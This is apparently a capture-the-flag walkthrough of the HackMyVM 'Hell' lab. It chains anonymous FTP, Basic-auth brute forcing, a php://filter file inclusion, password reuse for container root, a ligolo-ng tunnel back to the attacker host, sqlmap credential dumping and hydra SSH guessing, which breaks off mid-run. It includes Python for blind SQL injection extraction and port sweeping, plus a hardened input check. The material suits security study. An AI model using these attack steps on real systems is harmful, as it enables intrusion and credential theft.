HackMyVM-Hell-Walkthrough

Information gathering

Service discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.136 08:00:27:f3:52:2c PCS Systemtechnik GmbH
192.168.60.254 00:50:56:fe:fd:5b VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.039 seconds (125.55 hosts/sec). 4 responded
export ip=192.168.60.136
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Port scanning: Because every port has a story to tell.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.136:21
Open 192.168.60.136:22
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-13 20:02 CST
Initiating ARP Ping Scan at 20:02
Scanning 192.168.60.136 [1 port]
Completed ARP Ping Scan at 20:02, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:02
Completed Parallel DNS resolution of 1 host. at 20:02, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:02
Scanning 192.168.60.136 [2 ports]
Discovered open port 21/tcp on 192.168.60.136
Discovered open port 22/tcp on 192.168.60.136
Completed SYN Stealth Scan at 20:02, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.60.136
Host is up, received arp-response (0.00046s latency).
Scanned at 2025-04-13 20:02:37 CST for 0s

PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
22/tcp open ssh syn-ack ttl 64
MAC Address: 08:00:27:F3:52:2C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Notably, the usual port 80 is not open.

Anonymous FTP login

Port 21 is open, so check whether anonymous login is allowed.

Two files are present, flag.txt and .passwd.

❯ ftp anonymous@192.168.60.136
Connected to 192.168.60.136.
220 (vsFTPd 3.0.5)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||44130|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 115 4096 Feb 16 2023 .
drwxr-xr-x 2 0 115 4096 Feb 16 2023 ..
-rw-r--r-- 1 0 0 34 Feb 16 2023 .passwd
-rw-r--r-- 1 0 0 256 Feb 16 2023 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||49174|)
150 Opening BINARY mode data connection for flag.txt (256 bytes).
100% |******************************| 256 396.19 KiB/s 00:00 ETA
226 Transfer complete.
256 bytes received in 00:00 (226.03 KiB/s)
ftp> get .passwd
local: .passwd remote: .passwd
229 Entering Extended Passive Mode (|||60914|)
150 Opening BINARY mode data connection for .passwd (34 bytes).
100% |******************************| 34 35.06 KiB/s 00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (19.37 KiB/s)
ftp> exit
221 Goodbye.

Look at both.

That gives flag 1 and a password for some as yet unknown user.

cat flag.txt

▄▀█ █▄ █ █▀█ █▄ █ █▄█ █▀▄▀█ █▀█ █ █ █▀
█▀█ █ ▀█ █▄█ █ ▀█  █  █ ▀ █ █▄█ █▄█ ▄█

Flag 1: HELL{4N0NYM0U5_15_7H3_B357_U53R}

cat .passwd

The password is: webserver2023!

One thing I had forgotten: the machine description says to log in with run:run after boot and execute sudo run,

which starts the Docker service.


Scanning again, port 80 now shows up.

❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.136:21
Open 192.168.60.136:22
Open 192.168.60.136:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-13 20:31 CST
Initiating ARP Ping Scan at 20:31
Scanning 192.168.60.136 [1 port]
Completed ARP Ping Scan at 20:31, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:31
Completed Parallel DNS resolution of 1 host. at 20:31, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:31
Scanning 192.168.60.136 [3 ports]
Discovered open port 21/tcp on 192.168.60.136
Discovered open port 22/tcp on 192.168.60.136
Discovered open port 80/tcp on 192.168.60.136
Completed SYN Stealth Scan at 20:31, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.136
Host is up, received arp-response (0.00054s latency).
Scanned at 2025-04-13 20:31:38 CST for 0s

PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 63
MAC Address: 08:00:27:F3:52:2C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Directory enumeration turns up nothing.

Fingerprinting the site returns 401 Unauthorized.

❯ whatweb -v $ip
WhatWeb report for http://192.168.60.136
Status : 401 Unauthorized
Title : 401 Unauthorized
IP : 192.168.60.136
Country : RESERVED, ZZ

Summary : Apache[2.4.52], HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], WWW-Authenticate[Restricted Content][Basic]

Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.

Version : 2.4.52 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/

[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.

OS : Ubuntu Linux
String : Apache/2.4.52 (Ubuntu) (from server string)

[ WWW-Authenticate ]
This plugin identifies the WWW-Authenticate HTTP header and
extracts the authentication method and realm.

Module : Basic
String : Restricted Content

HTTP Headers:
HTTP/1.1 401 Unauthorized
Date: Sun, 13 Apr 2025 12:34:36 GMT
Server: Apache/2.4.52 (Ubuntu)
WWW-Authenticate: Basic realm="Restricted Content"
Content-Length: 461
Connection: close
Content-Type: text/html; charset=iso-8859-1

Username enumeration

Opening it in a browser prompts for a login; the site uses HTTP Basic authentication (realm "Restricted Content").


With the password obtained above, enumerate usernames by attempting logins with wfuzz; --hc 401 hides the failures, so only a valid pair shows up.

The user beilul can log in with that password.

❯ wfuzz -c -u "http://$ip" --basic FUZZ:webserver2023! -w /usr/share/seclists/Usernames/Names/names.txt --hc 401
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.136/
Total requests: 10177

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000001003: 200 34 L 92 W 1386 Ch "beilul"

That gives flag 2: HELL{BRUT3_F0RC3_M4Y_B3_4N_0P710N}

LFI to RCE


There is a profile selector; choosing an entry submits profile=eddiedota.html.

That looks like a local file inclusion.

The usual ../ traversal only returns "Atack detected",

so the code must be filtering the input.

Use a php://filter wrapper to read the page source instead.

❯ curl 'http://192.168.60.136/index.php?profile=php://filter/convert.base64-encode/resource=../../../var/www/html/index.php' -H "Authorization: Basic YmVpbHVsOndlYnNlcnZlcjIwMjMh" -s

... output omitted ...

Decode the base64 to get the source.

Sure enough it filters ./ and friends, but only by looking at the first characters of the value: a leading /, .. or ./ is rejected and nothing else is checked. A value starting with php://filter/ passes, and the ../ inside resource= is never inspected.

<!doctype html>
<html lang="en-US">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">

<title>Profiles</title>
<link rel="shortcut icon" type="image/png" sizes="64x64" href="https://avatars.githubusercontent.com/u/95899548?v=4">
<link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700" rel="stylesheet"><link rel="stylesheet" href="https://gatogamer1155.github.io/admin/style.css">
</head>

<body>
<body class="align">

<?php
echo "▄▀█ █░█ ▀█▀ █░█ █▀█ █▀█ █ ▀█ ▄▀█ ▀█▀ █ █▀█ █▄░█";
echo "<br>";
echo "█▀█ █▄█ ░█░ █▀█ █▄█ █▀▄ █ █▄ █▀█ ░█░ █ █▄█ █░▀█";
echo "<br><br>";
echo "<center>Flag 2: HELL{BRUT3_F0RC3_M4Y_B3_4N_0P710N}<center>";
echo "<br><br>";

?>

<form action="index.php" method="get">
<label for="option">Select Profile:</label>
<select id="option" name="profile" onchange="this.form.submit()" style="background-color: #333; color: #fff;">
<option value="s4vitar.html">default</option>
<option value="s4vitar.html">s4vitar</option>
<option value="eddiedota.html">EddieDota</option>
<option value="txhaka.html">Txhaka</option>
<option value="xdann1.html">xDaNN1</option>
<option value="gatogamer1155.html">GatoGamer1155</option>
<option value="onyx.html">ONYX</option>
<option value="0bfxgh0st.html">0bfxgh0st</option>
</select>
</form><br>

</body>
</html>

<?php
$file = isset($_GET['profile']) ? $_GET['profile'] : 's4vitar.html';

if (substr($file, 0, 1) !== "/" && substr($file, 0, 2) !== ".." && substr($file, 0,2) !== "./" ) {
include($file);
}

else echo "<h1>Atack detected</h1>";

?>
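As an added illustration (my code, not the target's index.php and not from the writeup), here is the prefix check ported to Python next to a hardened resolver, both run against the payloads used above. The profile directory and the allow-listed *.html naming are assumptions about the intended design; the sample profile file is constructed.

```python
import os
import tempfile

def php_prefix_check_allows(profile: str) -> bool:
    """Port of the check in index.php: only the first one or two characters
    are inspected, then the value is include()d unchanged."""
    return profile[:1] != "/" and profile[:2] != ".." and profile[:2] != "./"

def resolve_profile(profile: str, profile_dir: str):
    """Hardened replacement (assumed design: profiles are plain *.html files in
    one directory). Returns the resolved path, or None if the value is rejected."""
    # 1. allow-list the shape: a bare file name, no separators, no scheme (php://, data:)
    if not profile or "/" in profile or "\\" in profile or ":" in profile:
        return None
    if profile.startswith(".") or not profile.endswith(".html"):
        return None
    # 2. resolve symlinks and confine the canonical path to profile_dir
    base = os.path.realpath(profile_dir)
    target = os.path.realpath(os.path.join(base, profile))
    if os.path.commonpath([base, target]) != base:
        return None
    # 3. it must be an existing regular file
    return target if os.path.isfile(target) else None

PAYLOADS = [
    "eddiedota.html",                                   # legitimate value
    "../../../etc/passwd",                              # blocked by both
    "./eddiedota.html",                                 # blocked by both
    "php://filter/convert.base64-encode/resource=../../../var/www/html/index.php",
    "php://filter/convert.iconv.UTF8.CSISO2022KR/resource=php://temp",  # filter-chain shape
    "subdir/../../../../etc/passwd",                    # traversal behind a harmless first component
]

def evaluate(payloads, profile_dir):
    """{payload: (prefix_check_allows, hardened_allows)}"""
    return {p: (php_prefix_check_allows(p), resolve_profile(p, profile_dir) is not None)
            for p in payloads}

def demo():
    """Run the comparison against a constructed profile directory."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "eddiedota.html"), "w") as f:
            f.write("<h1>EddieDota</h1>")   # constructed sample profile
        return evaluate(PAYLOADS, d)

if __name__ == "__main__":
    for payload, (weak, strong) in demo().items():
        print(f"prefix-check={'pass' if weak else 'block':5} hardened={'pass' if strong else 'block':5} {payload}")
```

The point of the hardened version is that it never trusts the string: it allow-lists the shape (which rules out every wrapper scheme in one go), canonicalises, and then checks containment, so the filter-chain trick that produces flag 3 has nothing to attach to.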

See HackMyVM-Medusa-Walkthrough | Pepster's Blog for the same technique.

Shell and container root

Same recipe as in that writeup: a PHP filter chain fed through the include() gives code execution (flag 3's name is the hint).

The container has perl, so use a perl reverse shell,

with a listener waiting on the attacking machine.

That gives flag 3.

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.60.100
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from 81784ea2fbf9-192.168.60.136-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/81784ea2fbf9~192.168.60.136_Linux_x86_64/2025_04_13-21_03_14-321.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
www-data@81784ea2fbf9:/var/www/html$ cat flag.txt

█  █▀▀ █ ▀█ █▀█ █▀▀ █▀▀
█▄▄ █▀  █ █▄ █▀▄ █▄▄ ██▄

Flag 3: HELL{LF1_F1LT7R_CH41N_G3N3R4T0R}

Next, root inside the container. Guess at password reuse and try the password found earlier with su (flag 4's name points at the .htpasswd as the place it came from).

www-data@81784ea2fbf9:/tmp/toolkit-DSoHpKOn$ su root
Password:
root@81784ea2fbf9:/tmp/toolkit-DSoHpKOn# cat /root/flag.txt

█▀█ █▀█ █▀█ ▀█▀   █▀█ █▀█   █▄ █ █▀█ ▀█▀
█▀▄ █▄█ █▄█  █    █▄█ █▀▄   █ ▀█ █▄█  █

Flag 4: HELL{CR3D3NT14LS_1N_HTP455WD_3H?}

There are probably more containers. This container's IP is 172.17.0.2 (172.17.0.1 is the Docker bridge gateway, i.e. the host itself).

Internal network enumeration

Upload fscan to see what services the other containers expose.

www-data@81784ea2fbf9:/var/www$ cd /tmp/
www-data@81784ea2fbf9:/tmp$
[!] Session detached ⇲

(Penelope)─(Session [1])> upload ../toolkit/
[+] Upload OK /tmp/toolkit-DSoHpKOn

(Penelope)─(Session [1])> interact
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/81784ea2fbf9~192.168.60.136_Linux_x86_64/2025_04_13-21_03_14-321.log 📜
www-data@81784ea2fbf9:/tmp$ cd toolkit-DSoHpKOn/
www-data@81784ea2fbf9:/tmp/toolkit-DSoHpKOn$ hostname -I
172.17.0.2
www-data@81784ea2fbf9:/tmp/toolkit-DSoHpKOn$ ./fscan -h 172.17.0.1/24

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] Scan type: all, target ports: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] Starting information scan...
[*] CIDR range: 172.17.0.0-172.17.0.255
[*] Generated IP range: 172.17.0.0 - 172.17.0.255
[*] Parsed CIDR 172.17.0.1/24 -> IP range 172.17.0.0-172.17.0.255
[*] Final number of valid hosts: 256
[-] Trying ICMP probe without a listener...
[-] Current user lacks the privilege to send ICMP packets
[*] Falling back to PING probing...
[+] Target 172.17.0.2 alive (ICMP)
[+] Target 172.17.0.3 alive (ICMP)
[+] Target 172.17.0.1 alive (ICMP)
[+] ICMP alive hosts: 3
[*] Parsed 218 valid ports
[+] Port open 172.17.0.3:80
[+] Port open 172.17.0.2:80
[+] Port open 172.17.0.1:22
[+] Port open 172.17.0.3:22
[+] Port open 172.17.0.1:21
[+] Port open 172.17.0.1:80
[+] Open ports: 6
[*] Starting vulnerability scan...
[*] Web title http://172.17.0.2 status:401 length:457 title:401 Unauthorized
[+] ftp 172.17.0.1:21:anonymous
[->]flag.txt
[*] Web title http://172.17.0.3 status:200 length:761 title:""
[*] Web title http://172.17.0.1 status:401 length:457 title:401 Unauthorized
[!] Scan error 172.17.0.1:22 - total scan time exceeded: context deadline exceeded
[!] Scan error 172.17.0.3:22 - total scan time exceeded: context deadline exceeded
[+] Scan complete: 6/6
[*] Scan finished, elapsed: 24.825705749s
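An added alternative (my code, not from the writeup): if you would rather not drop a binary like fscan into the container, python3 is already there (penelope used /usr/bin/python3 for the PTY upgrade) and a standard-library connect() sweep needs neither raw sockets nor root, so it runs fine as www-data. The port list in the usage call is the one fscan found above; self_test() exercises the sweep against a constructed loopback listener.

```python
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor

def probe(host: str, port: int, timeout: float = 0.5) -> bool:
    """Plain connect(): no raw sockets, no root, so it runs as www-data."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0

def sweep(network: str, ports, timeout: float = 0.5, workers: int = 64):
    """Return sorted (host, port) pairs that accepted a TCP connection."""
    net = ipaddress.ip_network(network, strict=False)
    hosts = [str(h) for h in net.hosts()] or [str(net.network_address)]
    targets = [(h, p) for h in hosts for p in ports]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda hp: (hp, probe(*hp, timeout)), targets))
    return sorted(hp for hp, ok in results if ok)

def banner(host: str, port: int, timeout: float = 1.0) -> bytes:
    """Read what the service says first; FTP and SSH greet without any input."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            return s.recv(128)
        except socket.timeout:
            return b""

def self_test() -> bool:
    """Offline check on loopback: one listening socket (the kernel completes the
    handshake from the backlog, no accept() needed) and one port known to be closed."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    open_port = srv.getsockname()[1]
    tmp = socket.socket()
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()
    try:
        return sweep("127.0.0.1/32", [open_port, closed_port]) == [("127.0.0.1", open_port)]
    finally:
        srv.close()

if __name__ == "__main__":
    # Typical use from inside the container, on the Docker bridge network:
    for host, port in sweep("172.17.0.0/24", [21, 22, 80, 443, 3306]):
        print(host, port, banner(host, port))
```

A connect() sweep is noisier than a SYN scan (every probe completes a handshake and shows up in the service's logs), which is fine on a lab network and worth knowing on a real one.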

Ligolo tunnel

Use ligolo-ng to set up a TUN tunnel into the Docker network.

Details in TheHackersLabs-TheOffice-Walkthrough | Pepster's Blog.

# on the target
www-data@81784ea2fbf9:/tmp/toolkit-DSoHpKOn$ ./ligolo_agent -connect 192.168.60.100:11601 --ignore-cert &
[1] 815
www-data@81784ea2fbf9:/tmp/toolkit-DSoHpKOn$ WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established addr="192.168.60.100:11601"
--------------------------------------------------
# on Kali
sudo ./proxy -selfcert
[sudo] password for Pepster:
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 36C07692CB8DE46FF8EE2E7AE336EF247203DEBFCF7117298621D70583C93D3F
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/

Made in France ♥ by @Nicocha30!
Version: 0.7.5

ligolo-ng » interface_create --name docker
INFO[0007] Creating a new "docker" interface...
INFO[0007] Interface created!
ligolo-ng » INFO[0054] Agent joined. id=9991fa7a-556f-410d-b586-b5c3e09e61d5 name=www-data@81784ea2fbf9 remote="192.168.60.136:46024"
ligolo-ng » session
? Specify a session : 1 - www-data@81784ea2fbf9 - 192.168.60.136:46024 - 9991fa7a-556f-410d-b586-b5c3e09e61d5
[Agent : www-data@81784ea2fbf9] » tunnel_start --tun docker
[Agent : www-data@81784ea2fbf9] » INFO[0127] Starting tunnel to www-data@81784ea2fbf9 (9991fa7a-556f-410d-b586-b5c3e09e61d5)
-------------------------------------------------
sudo ip route add 172.17.0.0/24 dev docker
[sudo] password for Pepster:

Open it in the browser.

The page shows a notice (paraphrased): the application has been modified to only display output once the SQL query has been processed; because of a vulnerability the author preferred to suspend it rather than let you see all the information.


SQL injection

Enumerate directories on the other container's port 80.

There is an /admin directory.

❯ gobuster dir -u http://172.17.0.3 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 50 -x php,html,zip,txt -b 403,404

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.17.0.3
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,html,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 308] [--> http://172.17.0.3/admin/]
/index.html (Status: 200) [Size: 761]
Progress: 15792 / 132925 (11.88%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 15849 / 132925 (11.92%)
===============================================================
Finished
===============================================================

The admin page looks like a candidate for SQL injection.

Run sqlmap against it: both boolean-based and time-based blind injection are found (note the 170 HTTP 500 responses sqlmap triggered along the way).

❯ sqlmap -u "http://172.17.0.3/admin/index.php?id=1" --batch
... test output omitted ...
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1509=1509 AND 'ahWV'='ahWV

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2946 FROM (SELECT(SLEEP(5)))hSkh) AND 'UZYQ'='UZYQ
---
[21:19:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 22.04 (jammy)
web application technology: Apache 2.4.52
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[21:19:58] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 170 times
[21:19:58] [INFO] fetched data logged to text files under '/home/Pepster/.local/share/sqlmap/output/172.17.0.3'

[*] ending @ 21:19:58 /2025-04-13/
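To show what sqlmap is doing with that boolean-based payload, here is an added example (mine, not from the writeup). The vulnerable admin page is simulated with an in-memory SQLite table seeded with constructed rows, and SQLite's unicode() stands in for MySQL's ascii(). The oracle mirrors the page: a row back means true; an empty result or an SQL error (the 500s sqlmap reported) means false.

```python
import sqlite3

# Constructed stand-in for the vulnerable admin page: `id` is concatenated into
# the query and the response only reveals whether a row came back.
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE users(password TEXT, username TEXT);
INSERT INTO users VALUES ('beltran48','marco'),('iamoswe2023!','txhaka'),('superrootpassword','root');
CREATE TABLE items(id INTEGER, name TEXT);
INSERT INTO items VALUES (1,'first');
""")

def page_returns_row(id_param: str) -> bool:
    """The oracle. True = the page rendered a row (HTTP 200 with content);
    False = empty result or SQL error (the HTTP 500s sqlmap reported)."""
    sql = f"SELECT name FROM items WHERE id='{id_param}'"
    try:
        return _db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False

def blind_extract(oracle, subquery: str, max_len: int = 64) -> str:
    """Recover the string `subquery` returns, one character per binary search.
    Payload shape is sqlmap's:  1' AND <condition> AND 'x'='x
    (MySQL/MariaDB would use ascii() where SQLite has unicode())."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"1' AND length(({subquery}))>={pos} AND 'x'='x"):
            break                                   # past the end of the string
        lo, hi = 0, 127                             # printable ASCII assumed
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"1' AND unicode(substr(({subquery}),{pos},1))>{mid} AND 'x'='x"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out

def dump_password(username: str) -> str:
    return blind_extract(page_returns_row,
                         f"SELECT password FROM users WHERE username='{username}'")

if __name__ == "__main__":
    for user in ("marco", "txhaka", "root"):
        print(f"{user}: {dump_password(user)}")
```

Each character costs about eight requests (one length probe plus a seven-step binary search), which is why a dump of a small table is quick but a whole database is not. The time-based variant sqlmap also found swaps the oracle for a SLEEP() timing measurement and is an order of magnitude slower, so boolean-based is the one to prefer when both exist.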

Carry on: the creds and example databases each contain a users table,

and creds.users holds usernames together with passwords.

❯ sqlmap -u "http://172.17.0.3/admin/index.php?id=1" --batch --dbs
... test output omitted ...
---
[*] creds
[*] example
[*] information_schema

[21:22:03] [INFO] fetched data logged to text files under '/home/Pepster/.local/share/sqlmap/output/172.17.0.3'

[*] ending @ 21:22:03 /2025-04-13/

❯ sqlmap -u "http://172.17.0.3/admin/index.php?id=1" --batch -D creds --tables
... test output omitted ...
---
+-------+
| users |
+-------+

[21:22:31] [INFO] fetched data logged to text files under '/home/Pepster/.local/share/sqlmap/output/172.17.0.3'

[*] ending @ 21:22:31 /2025-04-13/

❯ sqlmap -u "http://172.17.0.3/admin/index.php?id=1" --batch -D creds -T users --dump
... test output omitted ...
---
+-------------------+----------+
| password | username |
+-------------------+----------+
| beltran48 | marco |
| iamoswe2023! | txhaka |
| superrootpassword | root |
+-------------------+----------+

[21:22:50] [INFO] table 'creds.users' dumped to CSV file '/home/Pepster/.local/share/sqlmap/output/172.17.0.3/dump/creds/users.csv'
[21:22:50] [INFO] fetched data logged to text files under '/home/Pepster/.local/share/sqlmap/output/172.17.0.3'

[*] ending @ 21:22:50 /2025-04-13/
# the other database, example
❯ sqlmap -u "http://172.17.0.3/admin/index.php?id=1" --batch -D example --tables
+-------+
| users |
+-------+

[21:43:38] [INFO] fetched data logged to text files under '/home/Pepster/.local/share/sqlmap/output/172.17.0.3'

[*] ending @ 21:43:38 /2025-04-13/

❯ sqlmap -u "http://172.17.0.3/admin/index.php?id=1" --batch -D example -T users --dump

+----+----------+
| id | username |
+----+----------+
| 1 | gato |
| 2 | eddie |
| 3 | txhaka |
| 4 | s4vitar |
| 5 | root |
+----+----------+

[21:45:40] [INFO] table 'example.users' dumped to CSV file '/home/Pepster/.local/share/sqlmap/output/172.17.0.3/dump/example/users.csv'
[21:45:40] [INFO] fetched data logged to text files under '/home/Pepster/.local/share/sqlmap/output/172.17.0.3'

[*] ending @ 21:45:40 /2025-04-13/

Pull the columns out of the CSV dumps into wordlists.

❯ awk -F , 'NR>1 && $1!="" && $2!="" {print $2}' /home/Pepster/.local/share/sqlmap/output/172.17.0.3/dump/creds/users.csv|tee user.txt
marco
txhaka
root
❯ awk -F , 'NR>1 && $1!="" && $2!="" {print $2}' /home/Pepster/.local/share/sqlmap/output/172.17.0.3/dump/example/users.csv|tee user2.txt
gato
eddie
txhaka
s4vitar
root
❯ awk -F , 'NR>1 && $1!="" && $2!="" {print $1}' /home/Pepster/.local/share/sqlmap/output/172.17.0.3/dump/creds/users.csv|tee pass.txt
beltran48
iamoswe2023!
superrootpassword

Brute forcing with hydra

Try the dumped credentials against SSH on the 172.17.0.3 container.

That yields txhaka:iamoswe2023!

❯ hydra -L user.txt -P pass.txt ssh://172.17.0.3
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-13 21:58:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
